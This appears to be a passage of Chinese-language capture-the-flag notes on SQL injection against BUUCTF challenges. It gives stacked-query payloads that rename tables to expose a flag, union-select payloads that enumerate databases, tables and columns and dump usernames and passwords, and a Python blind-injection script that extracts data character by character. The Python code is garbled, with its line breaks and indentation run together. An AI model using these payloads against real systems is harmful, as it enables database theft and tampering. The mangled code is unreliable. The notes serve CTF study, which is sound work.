1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#
拆分开来如下
1';altertable 源表名 renameto 源表名1;altertable 目标表名 renameto 源表名;altertable 源表名 change flag id varchar(50);#
第四种:使用union select
利用order by 4#或者union select 1,2,3,4#确定回显点
union select 1,2,database()#用于确定当前数据库名称
union select 1,2,group_concat(schema_name) from information_schema.schemata#用于查看所有数据库名称
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#用于都确定表名
union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘l0ve1ysq1’#用于确定字段名
union select 1,2,group_concat(id,username,password) from (databasename.tablename)#输出数据
import requests
if __name__ =='__main__':
url ="http://1bf27f3e-0eb4-41fd-8991-aef8381dbfbc.node3.buuoj.cn/index.php"
payload ={"id":""}
result =""for i inrange(1,100):
l =32
r =126
mid =(l + r)//2while(l < r):
payload["id"]="0^(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i, mid)
html = requests.post(url, data=payload)if"Hello"in html.text:
l = mid +1else:
r = mid
mid =(l + r)//2if(chr(mid)==" "):break
result = result +chr(mid)print(result)print("flag:", result)